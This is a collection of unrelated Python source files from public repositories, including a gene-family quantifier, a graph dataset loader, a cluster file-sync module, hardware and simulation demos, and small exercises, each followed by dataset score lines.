BaseXYPlot.hittest(self, screen_pt, threshold, return_distance) data_pt = self.map_data(screen_pt, all_values=True) index = self.index.get_data() value = self.value.get_data() poly = np.vstack((index,value)).T if points_in_polygon([data_pt], poly)[0] == 1: return True else: return False #------------------------------------------------------------------------ # Event handlers #------------------------------------------------------------------------ @on_trait_change('edge_color, edge_width, edge_style, face_color, alpha') def _attributes_changed(self): self.invalidate_draw() self.request_redraw() #------------------------------------------------------------------------ # Property getters #------------------------------------------------------------------------ @cached_property def _get_effective_edge_color(self): if len(self.edge_color_) == 4: edge_alpha = self.edge_color_[-1] else: edge_alpha = 1.0 c = self.edge_color_[:3] + (edge_alpha * self.alpha,) return c @cached_property def _get_effective_face_color(self): if len(self.face_color_) == 4: face_alpha = self.face_color_[-1] else: face_alpha = 1.0 c = self.face_color_[:3] + (face_alpha * self.alpha,) return c
2.71875
3
webapp/template_config.py
evgenyss/investing
0
1834
import os from datetime import timedelta basedir = os.path.abspath(os.path.dirname(__file__)) API_DATA_URL = "https://invest-public-api.tinkoff.ru/rest/tinkoff.public.invest.api.contract.v1.InstrumentsService/" API_LASTPRICES_URL = "https://invest-public-api.tinkoff.ru/rest/\ tinkoff.public.invest.api.contract.v1.MarketDataService/GetLastPrices" SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, '..', 'webapp.db') REMEMBER_COOKIE_DURATION = timedelta(days=1) SQLALCHEMY_TRACK_MODIFICATIONS = False SECRET_KEY = "" API_TOKEN = ""
1.96875
2
humann2/quantify/families.py
dytk2134/humann2
0
1835
<reponame>dytk2134/humann2 """ HUMAnN2: quantify_families module Compute alignments by gene family Copyright (c) 2014 Harvard School of Public Health Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import os import logging import math from .. import config from .. import utilities from .. import store # name global logging instance logger=logging.getLogger(__name__) def gene_families(alignments,gene_scores,unaligned_reads_count): """ Compute the gene families from the alignments """ logger.debug("Compute gene families") # Compute scores for each gene family for each bug set alignments.convert_alignments_to_gene_scores(gene_scores) # Process the gene id to names mappings gene_names=store.Names(config.gene_family_name_mapping_file) delimiter=config.output_file_column_delimiter category_delimiter=config.output_file_category_delimiter # Write the scores ordered with the top first column_name=config.file_basename+"_Abundance-RPKs" if config.remove_column_description_output: column_name=config.file_basename tsv_output=["# Gene Family"+delimiter+column_name] # Add the unaligned reads count tsv_output.append(config.unmapped_gene_name+delimiter+utilities.format_float_to_string(unaligned_reads_count)) # Print out the gene families with those with the highest scores first for gene in gene_scores.gene_list_sorted_by_score("all"): all_score=gene_scores.get_score("all",gene) if all_score>0: gene_name=gene_names.get_name(gene) # Print the computation of all bugs for gene family tsv_output.append(gene_name+delimiter+utilities.format_float_to_string(all_score)) # Process and print per bug if selected if not config.remove_stratified_output: # Print scores per bug for family ordered with those with the highest values first scores_by_bug=gene_scores.get_scores_for_gene_by_bug(gene) for bug in utilities.double_sort(scores_by_bug): if scores_by_bug[bug]>0: tsv_output.append(gene_name+category_delimiter+bug+delimiter +utilities.format_float_to_string(scores_by_bug[bug])) if config.output_format=="biom": # Open a temp file if a conversion to biom is selected tmpfile=utilities.unnamed_temp_file() file_handle=open(tmpfile,'w') file_handle.write("\n".join(tsv_output)) file_handle.close() utilities.tsv_to_biom(tmpfile,config.genefamilies_file,"Gene") else: # Write output as tsv format file_handle = open(config.genefamilies_file, "w") file_handle.write("\n".join(tsv_output)) file_handle.close() return config.genefamilies_file
2.21875
2
Buta Nicolae/threads.py
RazvanBalau/parallel-2020
0
1836
import threading from multiprocessing import Queue results = [] results2 = [] def take_numbers(q): print('Enter the numbers:') for i in range(0,3): num1 = int(input('Enter first number: ')) num2 = int(input('Enter second number: ')) q.put(num1) q.put(num2) def add_num(q): for i in range(0,3): num1 = q.get() num2 = q.get() results.append(num1+num2) results2.append(num1-num2) q = Queue() t2 = threading.Thread(target=add_num, args=(q, )) t1 = threading.Thread(target=take_numbers, args=(q, )) t2.start() t1.start() t2.join() t1.join() q.close() for result in results: print ("adunare =", result) for result in results2: print ("scadere =", result)
3.765625
4
code_week11_76_712/unique_paths.py
dylanlee101/leetcode
0
1837
''' 一个机器人位于一个 m x n 网格的左上角 (起始点在下图中标记为“Start” )。 机器人每次只能向下或者向右移动一步。机器人试图达到网格的右下角(在下图中标记为“Finish”)。 问总共有多少条不同的路径? 例如,上图是一个7 x 3 的网格。有多少可能的路径?   示例 1: 输入: m = 3, n = 2 输出: 3 解释: 从左上角开始,总共有 3 条路径可以到达右下角。 1. 向右 -> 向右 -> 向下 2. 向右 -> 向下 -> 向右 3. 向下 -> 向右 -> 向右 示例 2: 输入: m = 7, n = 3 输出: 28 来源:力扣(LeetCode) 链接:https://leetcode-cn.com/problems/unique-paths ''' class Solution: def uniquePaths(self, m: int, n: int) -> int: dp = [1] + [0] * n for i in range(m): for j in range(n): dp[j] = dp[j] + dp[j-1] return dp[-2]
3.6875
4
spektral/datasets/qm9.py
JonaBecher/spektral
2,145
1838
import os import os.path as osp import numpy as np from joblib import Parallel, delayed from tensorflow.keras.utils import get_file from tqdm import tqdm from spektral.data import Dataset, Graph from spektral.utils import label_to_one_hot, sparse from spektral.utils.io import load_csv, load_sdf ATOM_TYPES = [1, 6, 7, 8, 9] BOND_TYPES = [1, 2, 3, 4] class QM9(Dataset): """ The QM9 chemical data set of small molecules. In this dataset, nodes represent atoms and edges represent chemical bonds. There are 5 possible atom types (H, C, N, O, F) and 4 bond types (single, double, triple, aromatic). Node features represent the chemical properties of each atom and include: - The atomic number, one-hot encoded; - The atom's position in the X, Y, and Z dimensions; - The atomic charge; - The mass difference from the monoisotope; The edge features represent the type of chemical bond between two atoms, one-hot encoded. Each graph has an 19-dimensional label for regression. **Arguments** - `amount`: int, load this many molecules instead of the full dataset (useful for debugging). - `n_jobs`: number of CPU cores to use for reading the data (-1, to use all available cores). """ url = "https://deepchemdata.s3-us-west-1.amazonaws.com/datasets/gdb9.tar.gz" def __init__(self, amount=None, n_jobs=1, **kwargs): self.amount = amount self.n_jobs = n_jobs super().__init__(**kwargs) def download(self): get_file( "qm9.tar.gz", self.url, extract=True, cache_dir=self.path, cache_subdir=self.path, ) os.remove(osp.join(self.path, "qm9.tar.gz")) def read(self): print("Loading QM9 dataset.") sdf_file = osp.join(self.path, "gdb9.sdf") data = load_sdf(sdf_file, amount=self.amount) # Internal SDF format def read_mol(mol): x = np.array([atom_to_feature(atom) for atom in mol["atoms"]]) a, e = mol_to_adj(mol) return x, a, e data = Parallel(n_jobs=self.n_jobs)( delayed(read_mol)(mol) for mol in tqdm(data, ncols=80) ) x_list, a_list, e_list = list(zip(*data)) # Load labels labels_file = osp.join(self.path, "gdb9.sdf.csv") labels = load_csv(labels_file) labels = labels.set_index("mol_id").values if self.amount is not None: labels = labels[: self.amount] return [ Graph(x=x, a=a, e=e, y=y) for x, a, e, y in zip(x_list, a_list, e_list, labels) ] def atom_to_feature(atom): atomic_num = label_to_one_hot(atom["atomic_num"], ATOM_TYPES) coords = atom["coords"] charge = atom["charge"] iso = atom["iso"] return np.concatenate((atomic_num, coords, [charge, iso]), -1) def mol_to_adj(mol): row, col, edge_features = [], [], [] for bond in mol["bonds"]: start, end = bond["start_atom"], bond["end_atom"] row += [start, end] col += [end, start] edge_features += [bond["type"]] * 2 a, e = sparse.edge_index_to_matrix( edge_index=np.array((row, col)).T, edge_weight=np.ones_like(row), edge_features=label_to_one_hot(edge_features, BOND_TYPES), ) return a, e
2.4375
2
code/Level 1 - Intro to CPX/5-acceleration/main.py
tscofield/cpx-training
0
1839
from adafruit_circuitplayground.express import cpx # Main loop gets x, y and z axis acceleration, prints the values, and turns on # red, green and blue, at levels related to the x, y and z values. while True: if cpx.switch: print("Slide switch off!") cpx.pixels.fill((0, 0, 0)) continue else: R = 0 G = 0 B = 0 x, y, z = cpx.acceleration print((x, y, z)) if x: R = R + abs(int(x)) if y: G = G + abs(int(y)) if z: B = B + abs(int(z)) cpx.pixels.fill((R, G, B))
3.1875
3
src/data_preprocess.py
QinganZhao/ML-based-driving-motion-prediction
18
1840
<reponame>QinganZhao/ML-based-driving-motion-prediction import numpy as np import matplotlib.pyplot as plt import matplotlib as mpl import matplotlib.patches as patches def load_data(file_name, car_flag): if car_flag == 1: data = np.loadtxt('./car1/'+str(file_name)) elif car_flag == 2: data = np.loadtxt('./car2/'+str(file_name)) return data def get_low_freq_data(data): """ Return a data matrix with 0.1s per time step data. (from 0.01s data) """ matrix = np.zeros((1, data.shape[1])) for i in range(data.shape[0]): if i % 10 == 0: matrix = np.concatenate((matrix, data[i,:].reshape(1,data.shape[1])),axis=0) return matrix[1:,:] def data_process(): """ This function serves to concatenate the information of two cars into one array. Note: car1 -- mainlane car; car2 -- merging car; OutFormat: 0 case_ID 1 frame_ID 2 car1_long_pos 3 car1_long_vel 4 car1_lateral_pos 5 car1_lateral_displacement 6 car2_long_pos 7 car2_long_vel 8 car2_lateral_pos 9 car2_lateral_displacement 10 relative_long_vel (merge - mainlane) 11 relative_lateral_distance (merge - mainlane) 12 relative_long_distance (merge - mainlane) 13 car1_yaw 14 car2_yaw 15 situation label: (0: car1 yields car2; 1: car2 yields car1) """ data_matrix = np.zeros((1,16)) for i in range(128): file_name_1 = 'data_'+str(i)+'_1.txt' file_name_2 = 'data_'+str(i)+'_2.txt' car1 = get_low_freq_data(load_data(file_name_1, 1)) car2 = get_low_freq_data(load_data(file_name_2, 2)) T = int(car1.shape[0]) #print(T) current_data_matrix = np.zeros((T,16)) for j in range(1, T): current_data_matrix[j,0] = i current_data_matrix[j,1] = j current_data_matrix[j,2] = car1[j,1] current_data_matrix[j,3] = 10 * (car1[j,1] - car1[j-1,1]) current_data_matrix[j,4] = car1[j,2] current_data_matrix[j,5] = car1[j,2] - car1[j-1,2] current_data_matrix[j,6] = car2[j,1] current_data_matrix[j,7] = 10 * (car2[j,1] - car2[j-1,1]) current_data_matrix[j,8] = car2[j,2] current_data_matrix[j,9] = car2[j,2] - car2[j-1,2] current_data_matrix[j,10] = current_data_matrix[j,7] - current_data_matrix[j,3] current_data_matrix[j,11] = current_data_matrix[j,8] - current_data_matrix[j,4] current_data_matrix[j,12] = current_data_matrix[j,6] - current_data_matrix[j,2] current_data_matrix[j,13] = car1[j,3] current_data_matrix[j,14] = car2[j,3] if car1[-1,1] > car2[-1,1]: current_data_matrix[j,15] = 1 else: current_data_matrix[j,15] = 0 current_data_matrix = current_data_matrix[1:, :] data_matrix = np.concatenate((data_matrix, current_data_matrix),axis=0) np.savetxt('./data_matrix.txt', data_matrix[1:,:],'%.4f') ################################################################## def divide_data(data_matrix, segment_length): """ This function serves to separate two situation cases. """ situation0_data = data_matrix[np.where(data_matrix[:,-1] == 0)] situation1_data = data_matrix[np.where(data_matrix[:,-1] == 1)] np.savetxt('./all_trajs_1.txt', situation0_data, '%.4f') np.savetxt('./all_trajs_2.txt', situation1_data, '%.4f') # count seq lengths # separate sequence segments # all_trajs_seg_1 = np.zeros((1, data_matrix.shape[1])) # all_trajs_seg_2 = np.zeros((1, data_matrix.shape[1])) all_trajs_1 = np.zeros((1, data_matrix.shape[1])) all_trajs_2 = np.zeros((1, data_matrix.shape[1])) count0, count1 = [], [] # for i in range(128): # print('i = '+str(i)) # temp_data = data_matrix[np.where(data_matrix[:,0] == i)] # if temp_data[0,-1] == 0: # for j in range(temp_data.shape[0]-segment_length+1): # temp_seg_data = temp_data[j:j+segment_length, :] # count0.append(temp_seg_data.shape[0]) # all_trajs_seg_1 = np.concatenate((all_trajs_seg_1, temp_seg_data),axis=0) # else: # for j in range(temp_data.shape[0]-segment_length+1): # temp_seg_data = temp_data[j:j+segment_length, :] # count1.append(temp_seg_data.shape[0]) # all_trajs_seg_2 = np.concatenate((all_trajs_seg_2, temp_seg_data),axis=0) for i in range(128): print('i = '+str(i)) temp_data = data_matrix[np.where(data_matrix[:,0] == i)] if temp_data[0,-1] == 0: count0.append(temp_data.shape[0]) all_trajs_1 = np.concatenate((all_trajs_1, temp_data),axis=0) elif temp_data[0,-1] == 1: count1.append(temp_data.shape[0]) all_trajs_2 = np.concatenate((all_trajs_2, temp_data),axis=0) print(all_trajs_1.shape) print(all_trajs_2.shape) print(sum(count0)) print(sum(count1)) # np.savetxt('./all_trajs_seg_1.txt', all_trajs_seg_1[1:,:], '%.4f') # np.savetxt('./all_trajs_seg_2.txt', all_trajs_seg_2[1:,:], '%.4f') np.savetxt('./all_trajs_seq_length_1.txt', np.array(count0), '%d') np.savetxt('./all_trajs_seq_length_2.txt', np.array(count1), '%d') #data_process() #data_matrix = np.loadtxt('./data_matrix.txt') #divide_data(data_matrix=data_matrix, segment_length=30) ############################################### def check_data(): data = np.loadtxt('../simulation_data/data_matrix.txt') temp_data = data[np.where(data[:,0]==69)] T = temp_data.shape[0] car1_long_vel = temp_data[:,3] car2_long_vel = temp_data[:,7] car1_acc = 10*(temp_data[1:,3]-temp_data[:-1,3]) car2_acc = 10*(temp_data[1:,7]-temp_data[:-1,7]) # plt.figure(1) # plt.plot(range(T-1), car1_acc, c='b', label='main lane car acceleration') # plt.plot(range(T-1), car2_acc, c='r', label='merging car acceleration') # plt.legend() plt.figure(2,figsize=(14,4)) plt.plot(range(T), car1_long_vel, c='b', label='main lane car velocity') plt.plot(range(T), car2_long_vel, c='r', label='merging car velocity') plt.legend() plt.savefig('./long_vel_69.eps', bbox_inches='tight') #plt.show() #check_data() ############################################### def plot_vehicles(case_id, data_matrix): """ This function is to plot vehicle trajectories with bounding boxes. """ current_case_data = data_matrix[np.where(data_matrix[:,0]==case_id)] T = current_case_data.shape[0] fig = plt.figure(figsize=(20,2)) for i in range(T): if i<10: name='00'+str(i) elif i>=10 and i<100: name = '0'+str(i) elif i>=100: name = str(i) ax = fig.add_subplot(111, aspect='equal') ax.add_patch( patches.Rectangle( (current_case_data[i,2]-2.0, current_case_data[i,4]-0.9), # (x,y) 4.0, # width 1.8, # height alpha = 0.3 + 0.7*(T-i) / float(T), facecolor='blue', edgecolor='black', linewidth=0.5 ) ) ax.add_patch( patches.Rectangle( (current_case_data[i,6]-2.0, current_case_data[i,8]-0.9), # (x,y) 4.0, # width 1.8, # height alpha = 0.3 + 0.7*(T-i) / float(T), facecolor='red', edgecolor='black', linewidth=0.5 ) ) ax.plot(range(-805,-360),-605*np.ones(445), color='k',linewidth=1) ax.plot(range(-805,-584),-610*np.ones(221), color='k',linewidth=1) ax.plot(range(-445,-360),-610*np.ones(85), color='k',linewidth=1) x = [[-584,-805],[-445,-805]] y = [[-610,-618],[-610,-622]] for l in range(len(x)): ax.plot(x[l], y[l], color='k',linewidth=1) ax.set_xlim(-680, -400) ax.set_ylim(-620, -600) ax.set_xticks([]) ax.set_yticks([]) fig.savefig('./vehicles_plot/'+str(case_id)+'_'+str(name)+'.png', bbox_inches='tight') data_matrix = np.loadtxt('./data_matrix.txt') plot_vehicles(case_id=8, data_matrix=data_matrix)
3.109375
3
balancesheet/equityManager.py
tylertjburns/ledgerkeeper
0
1841
<reponame>tylertjburns/ledgerkeeper<gh_stars>0 import balancesheet.mongoData.equities_data_service as dsvce from userInteraction.financeCliInteraction import FinanceCliInteraction import ledgerkeeper.mongoData.account_data_service as dsvca from balancesheet.enums import EquityClass, AssetType, LiabiltyType, EquityTimeHorizon, EquityStatus, EquityContingency import plotter as plot class EquityManager(): def __init__(self, user_notification_system: FinanceCliInteraction): self.uns = user_notification_system def add_equity(self): name = self.uns.request_string("Name: ") description = self.uns.request_string("Description: ") accountName = self.uns.request_from_dict(dsvca.accounts_as_dict()) equityClass = self.uns.request_enum(EquityClass) if equityClass == EquityClass.ASSET: equityType = self.uns.request_enum(AssetType) elif equityClass == EquityClass.LIABILITY: equityType = self.uns.request_enum(LiabiltyType) else: raise Exception(f"Unknown equity class: {equityClass.name}") interestRate = self.uns.request_float("Interest Rate: ") equityTimeHorizon = self.uns.request_enum(EquityTimeHorizon) equityStatus = self.uns.request_enum(EquityStatus) equityContingency = self.uns.request_enum(EquityContingency) equity = dsvce.enter_if_not_exists(name=name, description=description, accountId=str(dsvca.account_by_name(accountName).id), equityClass=equityClass, equityType=equityType, equityTimeHorizon=equityTimeHorizon, equityStatus=equityStatus, equityContingency=equityContingency, interestRate=interestRate) if equity is not None: self.uns.notify_user("Equity entered successfully!") def delete_equity(self): accountName = self.uns.request_from_dict(dsvca.accounts_as_dict()) equityName = self.uns.request_from_dict(dsvce.equities_as_dict()) dsvce.delete_equity(dsvca.account_by_name(accountName).id, equityName) def record_value(self): accountName = self.uns.request_from_dict(dsvca.accounts_as_dict()) equityName = self.uns.request_from_dict(dsvce.equities_as_dict()) year = self.uns.request_int("Year: ") month = self.uns.request_int("Month: ") value = self.uns.request_float("Value: ") account = dsvca.account_by_name(accountName) equity = dsvce.equity_by_account_and_name(str(account.id), equityName) if equity is None: raise Exception(f"Equity: {accountName} [{account.id}], {equityName} not found.") value = dsvce.record_value_on_equity(equity, year, month, value) if value is not None: self.uns.notify_user("Value Recorded successfully!") def print_value_snapshots(self, accountName=None): if accountName is None: accountName = self.uns.request_from_dict(dsvca.accounts_as_dict()) account = dsvca.account_by_name(accountName) equities = dsvce.equities_by_account(account.id) if equities is None or len(equities) == 0: self.uns.notify_user(f"No Equities in account [{accountName}]") return self.uns.pretty_print_items(sorted(equities, key=lambda x: x.equityType), title="Equities Snapshots") def print_equities(self): self.uns.pretty_print_items(dsvce.query_equities("").to_json(), title="Equities") def print_balance_sheet(self): accountName = self.uns.request_from_dict(dsvca.accounts_as_dict()) relevant_mos = self.uns.request_int("Number of past months: ") account = dsvca.account_by_name(accountName) data = dsvce.balance_sheet_over_time(relevant_months=relevant_mos, accountIds=[str(account.id)]) self.uns.notify_user(f"\n---------Balance Sheet---------") self.uns.pretty_print_items(data) def plot_balance_over_time(self): relevant_mos = self.uns.request_int("Number of past months: ") accountName = self.uns.request_from_dict(dsvca.accounts_as_dict()) account = dsvca.account_by_name(accountName) ax = plot.plot_assets_liabilities_worth_over_time(relevant_mos, accountIds=[str(account.id)]) if ax is None: self.uns.notify_user("No Data to show...")
2.390625
2
examples/django/hello_world/wsgi.py
liuyu81/SnapSearch-Client-Python
0
1842
import os os.environ.setdefault("DJANGO_SETTINGS_MODULE", "hello_world.settings") # django WSGI application from django.core.wsgi import get_wsgi_application application = get_wsgi_application() # load SnapSearch API credentials api_email = "<email>" api_key = "<key>" # initialize the interceptor from SnapSearch import Client, Detector, Interceptor interceptor = Interceptor(Client(api_email, api_key), Detector()) # deploy the interceptor from SnapSearch.wsgi import InterceptorMiddleware application = InterceptorMiddleware(application, interceptor)
1.625
2
confluent_server/confluent/syncfiles.py
xcat2/confluent
27
1843
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2021 Lenovo # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import glob import os import shutil import tempfile import confluent.sshutil as sshutil import confluent.util as util import confluent.noderange as noderange import eventlet import pwd import grp def mkdirp(path): try: os.makedirs(path) except OSError as e: if e.errno != 17: raise def get_entries(filename): secname = 'REPLACE:' filename = filename.strip() if filename[-1] == '>': filename = filename[:-1] with open(filename, 'r') as slfile: slist = slfile.read() entries = slist.split('\n') for ent in entries: ent = ent.split('#', 1)[0].strip() if not ent: continue if ent in ('APPENDONCE:', 'MERGE:', 'REPLACE:'): secname = ent if ent[0] == '<': subfilename = ent[1:] if subfilename[-1] == '>': subfilename = subfilename[:-1] if subfilename[0] != '/': subfilename = os.path.join(os.path.dirname(filename), subfilename) for subent in get_entries(subfilename): yield subent yield secname else: yield ent class SyncList(object): def __init__(self, filename, nodename, cfg): slist = None self.replacemap = {} self.appendmap = {} self.appendoncemap = {} self.mergemap = {} self.optmap = {} entries = get_entries(filename) currmap = self.replacemap for ent in entries: try: cmtidx = ent.index('#') ent = ent[:cmtidx] except ValueError: pass for special in '$%^&|{}': if special in ent: raise Exception( 'Special character "{}" reserved for future use'.format(special)) ent = ent.strip() if not ent: continue if ent[-1] == ':': if ent == 'MERGE:': currmap = self.mergemap elif ent == 'APPENDONCE:': currmap = self.appendoncemap elif ent == 'REPLACE:': currmap = self.replacemap else: raise Exception( 'Section "{}" is not currently supported in syncfiles'.format(ent[:-1])) continue if '->' in ent: k, v = ent.split('->') k = k.strip() v = v.strip() if ':' in v: nr, v = v.split(':', 1) for candidate in noderange.NodeRange(nr, cfg).nodes: if candidate == nodename: break else: continue optparts = v.split() v = optparts[0] optparts = optparts[1:] else: kparts = [] optparts = [] currparts = kparts for part in ent.split(): if part[0] == '(': currparts = optparts currparts.append(part) k = ' '.join(kparts) v = None entopts = {} if optparts: if optparts[0][0] != '(' or optparts[-1][-1] != ')': raise Exception("Unsupported syntax in syncfile: " + ent) opts = ','.join(optparts) opts = opts[1:-1] for opt in opts.split(','): optname, optval = opt.split('=') if optname == 'owner': try: uid = pwd.getpwnam(optval).pw_uid except KeyError: uid = None optval = {'name': optval, 'id': uid} elif optname == 'group': try: gid = grp.getgrnam(optval).gr_gid except KeyError: gid = None optval = {'name': optval, 'id': gid} entopts[optname] = optval currmap[k] = v targ = v if v else k for f in targ.split(): self.optmap[f] = entopts def sync_list_to_node(sl, node, suffixes): targdir = tempfile.mkdtemp('.syncto{}'.format(node)) output = '' try: for ent in sl.replacemap: stage_ent(sl.replacemap, ent, targdir) if 'append' in suffixes: while suffixes['append'] and suffixes['append'][0] == '/': suffixes['append'] = suffixes['append'][1:] for ent in sl.appendmap: stage_ent(sl.appendmap, ent, os.path.join(targdir, suffixes['append'])) if 'merge' in suffixes: while suffixes['merge'] and suffixes['merge'][0] == '/': suffixes['merge'] = suffixes['merge'][1:] for ent in sl.mergemap: stage_ent(sl.mergemap, ent, os.path.join(targdir, suffixes['merge']), True) if 'appendonce' in suffixes: while suffixes['appendonce'] and suffixes['appendonce'][0] == '/': suffixes['appendonce'] = suffixes['appendonce'][1:] for ent in sl.appendoncemap: stage_ent(sl.appendoncemap, ent, os.path.join(targdir, suffixes['appendonce']), True) sshutil.prep_ssh_key('/etc/confluent/ssh/automation') output = util.run( ['rsync', '-rvLD', targdir + '/', 'root@{}:/'.format(node)])[0] except Exception as e: if 'CalledProcessError' not in repr(e): # https://github.com/eventlet/eventlet/issues/413 # for some reason, can't catch the calledprocesserror normally # for this exception, implement a hack workaround raise unreadablefiles = [] for root, dirnames, filenames in os.walk(targdir): for filename in filenames: filename = os.path.join(root, filename) try: with open(filename, 'r') as _: pass except OSError as e: unreadablefiles.append(filename.replace(targdir, '')) if unreadablefiles: raise Exception("Syncing failed due to unreadable files: " + ','.join(unreadablefiles)) else: raise finally: shutil.rmtree(targdir) if not isinstance(output, str): output = output.decode('utf8') retval = { 'options': sl.optmap, 'output': output, } return retval # need dictionary with output and options def stage_ent(currmap, ent, targdir, appendexist=False): dst = currmap[ent] everyfent = [] allfents = ent.split() for tmpent in allfents: fents = glob.glob(tmpent) everyfent.extend(fents) if not everyfent: raise Exception('No matching files for "{}"'.format(ent)) if dst is None: # this is to indicate source and destination as one dst = os.path.dirname(everyfent[0]) + '/' while dst and dst[0] == '/': dst = dst[1:] if len(everyfent) > 1 and dst[-1] != '/': raise Exception( 'Multiple files match {}, {} needs a trailing slash to indicate a directory'.format(ent, dst)) fulltarg = os.path.join(targdir, dst) for targ in everyfent: mkpathorlink(targ, fulltarg, appendexist) def mkpathorlink(source, destination, appendexist=False): if os.path.isdir(source): mkdirp(destination) for ent in os.listdir(source): currsrc = os.path.join(source, ent) currdst = os.path.join(destination, ent) mkpathorlink(currsrc, currdst) else: if destination[-1] == '/': mkdirp(destination) destination = os.path.join(destination, os.path.basename(source)) else: mkdirp(os.path.dirname(destination)) if appendexist and os.path.exists(destination): tmpnam = tempfile.mktemp() shutil.copy(destination, tmpnam) os.remove(destination) with open(destination, 'w') as realdest: with open(tmpnam) as olddest: realdest.write(olddest.read()) with open(source) as sourcedata: realdest.write(sourcedata.read()) os.remove(tmpnam) else: os.symlink(source, destination) syncrunners = {} def start_syncfiles(nodename, cfg, suffixes): deployinfo = cfg.get_node_attributes( nodename, ('deployment.*',)) deployinfo = deployinfo.get(nodename, {}) profile = deployinfo.get( 'deployment.pendingprofile', {}).get('value', '') if not profile: profile = deployinfo.get( 'deployment.stagedprofile', {}).get('value', '') if not profile: profile = deployinfo.get( 'deployment.profile', {}).get('value', '') if not profile: raise Exception('Cannot perform syncfiles without profile assigned') synclist = '/var/lib/confluent/public/os/{}/syncfiles'.format(profile) if not os.path.exists(synclist): return '200 OK' # not running sl = SyncList(synclist, nodename, cfg) if not (sl.appendmap or sl.mergemap or sl.replacemap or sl.appendoncemap): return '200 OK' # the synclist has no actual entries syncrunners[nodename] = eventlet.spawn( sync_list_to_node, sl, nodename, suffixes) return '202 Queued' # backgrounded def get_syncresult(nodename): if nodename not in syncrunners: return ('204 Not Running', '') if not syncrunners[nodename].dead: return ('200 OK', '') result = syncrunners[nodename].wait() del syncrunners[nodename] return ('200 OK', result)
2.125
2
fym/models/missile.py
JungYT/fym
14
1844
<reponame>JungYT/fym<gh_stars>10-100 import numpy as np from fym.core import BaseSystem class MissilePlanar(BaseSystem): R = 288 g = 9.80665 S = 1 t1 = 1.5 t2 = 8.5 name = 'missile' def __init__(self, initial_state): super().__init__(initial_state) def external(self, states, controls): return 0 # return {"wind" : [(0, 0), (0, 0)]} # no external effects def deriv(self, state, t, control, external): # state and (control) input x, y, V, gamma, = state.ravel() a = control # temperature if y <= 11000: Tmp = 288.16 - 0.0065*y else: Tmp = 216.66 # Mach number M = V/(1.4*self.R*Tmp)**0.5 # Mass and thrust (Note: guidance loop is closed after t=t1) if t < self.t1: m = 135 - 14.53*t T = 33000 elif t < self.t2: m = 113.205 - 3.331*t T = 7500 else: m = 90.035 T = 0 # density and dynamic pressure rho = (1.15579 - 1.058*1e-4*y + 3.725*1e-9*y**2 - 6.0*1e-14*y**3) # y in [0, 20000] Q = 0.5*rho*V**2 # Drag model if M < 0.93: Cd0 = 0.02 elif M < 1.03: Cd0 = 0.02 + 0.2*(M - 0.93) elif M < 1.10: Cd0 = 0.04 + 0.06*(M - 1.03) else: Cd0 = 0.0442 - 0.007*(M - 1.10) if M < 1.15: K = 0.2 else: K = 0.2 + 0.246*(M - 1.15) D0 = Cd0*Q*self.S Di = K*m**2*a**2/(Q*self.S) D = D0 + Di dxdt = V*np.cos(gamma) dydt = V*np.sin(gamma) dVdt = (T - D)/m - self.g*np.sin(gamma) dgammadt = (a - self.g*np.cos(gamma))/V return np.vstack([dxdt, dydt, dVdt, dgammadt])
2.859375
3
egg/zoo/addition/data.py
chengemily/EGG
1
1845
<filename>egg/zoo/addition/data.py<gh_stars>1-10 # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from typing import Iterable, Optional, Tuple import torch from torch.utils.data import DataLoader class ScaledDataset: def __init__(self, examples, scaling_factor=1): self.examples = examples self.scaling_factor = scaling_factor def __len__(self): return len(self.examples) * self.scaling_factor def __getitem__(self, k): k = k % len(self.examples) return self.examples[k] def get_dataloaders(opts) -> Tuple[Iterable[ Tuple[torch.Tensor, torch.Tensor, Optional[torch.Tensor]] ], Iterable[ Tuple[torch.Tensor, torch.Tensor, Optional[torch.Tensor]] ]]: "Returning an iterator for tuple(sender_input, labels, receiver_input)." full_data = enumerate_dataset(opts.input_size) len_train = int(opts.training_density * len(full_data)) train_set, holdout_set = torch.utils.data.random_split(full_data, [len_train, len(full_data) - len_train] ) validation_set = train_set train_set = ScaledDataset(train_set, opts.data_scaler) train_loader, validation_loader, holdout_loader = DataLoader(train_set, batch_size=opts.batch_size, shuffle=True), \ DataLoader(validation_set, batch_size=len(validation_set)), \ DataLoader(holdout_set, batch_size=opts.batch_size) return train_loader, validation_loader, holdout_loader def enumerate_dataset(input_size): data = [] labels = [] for i in range(input_size): for j in range(input_size): inp = torch.zeros(2 * input_size) inp[i] = 1.0 inp[input_size + j] = 1.0 label = torch.zeros(2 * input_size - 1) label[i + j] = 1.0 data.append(inp) labels.append(label) data_tuples = [(data[i], labels[i]) for i in range(len(data))] return data_tuples
2.21875
2
mathfun/lexographic.py
lsbardel/mathfun
0
1846
""" Next lexicographical permutation algorithm https://www.nayuki.io/page/next-lexicographical-permutation-algorithm """ def next_lexo(S): b = S[-1] for i, a in enumerate(reversed(S[:-1]), 2): if a < b: # we have the pivot a for j, b in enumerate(reversed(S), 1): if b > a: F = list(S) F[-i], F[-j] = F[-j], F[-i] F = F[: -i + 1] + sorted(F[-i + 1 :]) return "".join(F) else: b = a return "no answer"
3.671875
4
simulation-web3py/utility.py
